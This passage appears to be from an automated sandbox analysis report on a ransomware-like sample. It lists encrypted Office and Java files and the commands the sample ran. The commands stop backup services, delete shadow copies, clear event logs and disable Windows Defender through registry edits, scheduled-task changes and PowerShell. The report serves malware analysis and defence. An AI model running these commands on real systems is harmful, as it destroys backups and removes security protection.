| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\MEDIA\CASHREG.WAV.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_icQ-Iw1fzpY0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\de-DE\rtscom.dll.mui | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-masterfs-nio2.xml.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_MF9ElsAtDMM0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre1.8.0_66\lib\plugin.jar.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_-kFX3LjiTcg0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ExcelVL_KMS_Client-ul.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_gDi1AfmKlow0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\NewComment.White@3x.png.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_8LtOLH_mnlk0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\epl-v10.html.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_xy8buR5xrsw0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\epl-v10.html.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_vdVp-Fhv3hc0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\MondoR_SubTest2-ppd.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_srYJQnnqZCQ0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_OEM_Perp3-ppd.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_NSNFFUtZpMw0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\ADDINS\EduWorks Data Streamer Add-In\MicrosoftDataStreamerforExcel.dll.config.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_Zo6arwmkj4A0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.contrast-black_scale-140.png.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_x9Oejgf73eQ0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProjectStd2019VL_KMS_Client_AE-ppd.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_9zN3T-f8_8A0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Templates\1033\EssentialReport.dotx.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_32dn4WAdokM0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-text_zh_CN.jar.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_NROijV3XKCk0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\PersonalPipcDemoR_BypassTrial365-ul-oob.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_eYiIJ7kf_YE0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-sampler_zh_CN.jar.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_d_WaBF4u2rw0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\Professional2019R_Grace-ppd.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_V5xJ9rhRmaY0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\msadc\ja-JP\msadcor.dll.mui | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\MSInfo\ja-JP\msinfo32.exe.mui | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.nl_ja_4.4.0.v20140623020002.jar.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_bc8croij8Do0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\MondoR_Retail-ul-phn.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_2CgErdBlaFM0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\vssadmin.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP | C:\Windows\SysWOW64\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP | C:\Windows\SysWOW64\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP | C:\Windows\SysWOW64\reg.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
"C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe"
C:\Windows\SysWOW64\net.exe
net.exe stop "SamSs" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "SDRSVC" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "SstpSvc" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "UI0Detect" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "UI0Detect" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "vmicvss" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "vmicvss" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "VSS" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "wbengine" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "WebClient" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "UnistoreSvc_13048" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "UnistoreSvc_13048" /y
C:\Windows\SysWOW64\sc.exe
sc.exe config "SamSs" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "SDRSVC" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "SstpSvc" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "UI0Detect" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "vmicvss" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "VSS" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "wbengine" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "WebClient" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "UnistoreSvc_13048" start= disabled
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl system
C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl security
C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl application
C:\Windows\SysWOW64\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\SysWOW64\Wbem\wmic.exe
wmic.exe shadowcopy delete
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
Network
| Country | Destination | Domain | Proto |
| US | 52.109.12.20:443 | tcp | |
| US | 8.8.8.8:53 | time.windows.com | udp |
| NL | 40.119.148.38:123 | time.windows.com | udp |
| NL | 84.53.175.107:80 | tcp |
Files
memory/3952-115-0x0000000000000000-mapping.dmp
memory/3456-116-0x0000000000000000-mapping.dmp
memory/1984-117-0x0000000000000000-mapping.dmp
memory/1632-118-0x0000000000000000-mapping.dmp
memory/64-119-0x0000000000000000-mapping.dmp
memory/4196-120-0x0000000000000000-mapping.dmp
memory/4204-121-0x0000000000000000-mapping.dmp
memory/788-122-0x0000000000000000-mapping.dmp
memory/4340-123-0x0000000000000000-mapping.dmp
memory/4428-124-0x0000000000000000-mapping.dmp
memory/4388-125-0x0000000000000000-mapping.dmp
memory/4276-126-0x0000000000000000-mapping.dmp
memory/3200-127-0x0000000000000000-mapping.dmp
memory/3804-128-0x0000000000000000-mapping.dmp
memory/316-129-0x0000000000000000-mapping.dmp
memory/2836-130-0x0000000000000000-mapping.dmp
memory/508-131-0x0000000000000000-mapping.dmp
memory/792-132-0x0000000000000000-mapping.dmp
memory/888-133-0x0000000000000000-mapping.dmp
memory/892-134-0x0000000000000000-mapping.dmp
memory/1224-135-0x0000000000000000-mapping.dmp
memory/1392-136-0x0000000000000000-mapping.dmp
memory/1624-137-0x0000000000000000-mapping.dmp
memory/1748-138-0x0000000000000000-mapping.dmp
memory/2052-139-0x0000000000000000-mapping.dmp
memory/2408-140-0x0000000000000000-mapping.dmp
memory/2712-141-0x0000000000000000-mapping.dmp
memory/2760-142-0x0000000000000000-mapping.dmp
memory/3728-143-0x0000000000000000-mapping.dmp
memory/3956-144-0x0000000000000000-mapping.dmp
memory/4084-145-0x0000000000000000-mapping.dmp
memory/4824-146-0x0000000000000000-mapping.dmp
memory/2204-147-0x0000000000000000-mapping.dmp
memory/1304-148-0x0000000000000000-mapping.dmp
memory/2996-149-0x0000000000000000-mapping.dmp
memory/4852-150-0x0000000000000000-mapping.dmp
memory/4596-151-0x0000000000000000-mapping.dmp
memory/4872-152-0x0000000000000000-mapping.dmp
memory/4472-153-0x0000000000000000-mapping.dmp
memory/5028-154-0x0000000000000000-mapping.dmp
memory/624-155-0x0000000000000000-mapping.dmp
memory/1276-156-0x0000000000000000-mapping.dmp
memory/4944-157-0x0000000000000000-mapping.dmp
memory/4960-158-0x0000000000000000-mapping.dmp
memory/416-159-0x0000000000000000-mapping.dmp
memory/2104-160-0x0000000000000000-mapping.dmp
memory/1244-161-0x0000000000000000-mapping.dmp
memory/1588-162-0x0000000000000000-mapping.dmp
memory/1796-163-0x0000000000000000-mapping.dmp
memory/1856-164-0x0000000000000000-mapping.dmp
memory/2124-165-0x0000000000000000-mapping.dmp
memory/2596-166-0x0000000000000000-mapping.dmp
memory/4400-167-0x0000000000000000-mapping.dmp
memory/3304-168-0x0000000000000000-mapping.dmp
memory/4932-169-0x0000000000000000-mapping.dmp
memory/4484-170-0x0000000000000000-mapping.dmp
memory/2304-171-0x0000000000000000-mapping.dmp
memory/3708-172-0x0000000000000000-mapping.dmp
memory/4988-173-0x0000000000000000-mapping.dmp
memory/3092-174-0x0000000000000000-mapping.dmp
memory/4976-175-0x0000000000000000-mapping.dmp
memory/2828-176-0x0000000000000000-mapping.dmp
memory/3456-177-0x0000000000000000-mapping.dmp
memory/364-178-0x0000000000000000-mapping.dmp
memory/3268-179-0x00000000046F0000-0x00000000046F1000-memory.dmp
memory/3268-180-0x00000000046F0000-0x00000000046F1000-memory.dmp
memory/3268-181-0x0000000004870000-0x00000000048A6000-memory.dmp
memory/3268-182-0x00000000073B0000-0x00000000079D8000-memory.dmp
memory/3268-183-0x00000000071E0000-0x0000000007202000-memory.dmp
memory/3268-184-0x0000000007BC0000-0x0000000007C26000-memory.dmp
memory/3268-185-0x0000000007AE0000-0x0000000007B46000-memory.dmp
memory/3268-186-0x0000000006D70000-0x0000000006D71000-memory.dmp
memory/3268-187-0x0000000007CF0000-0x0000000008040000-memory.dmp
memory/3268-188-0x0000000006D72000-0x0000000006D73000-memory.dmp
memory/3268-189-0x0000000007B90000-0x0000000007BAC000-memory.dmp
memory/3268-190-0x0000000008570000-0x00000000085BB000-memory.dmp
memory/3268-191-0x0000000008370000-0x00000000083E6000-memory.dmp
memory/3268-192-0x00000000046F0000-0x00000000046F1000-memory.dmp
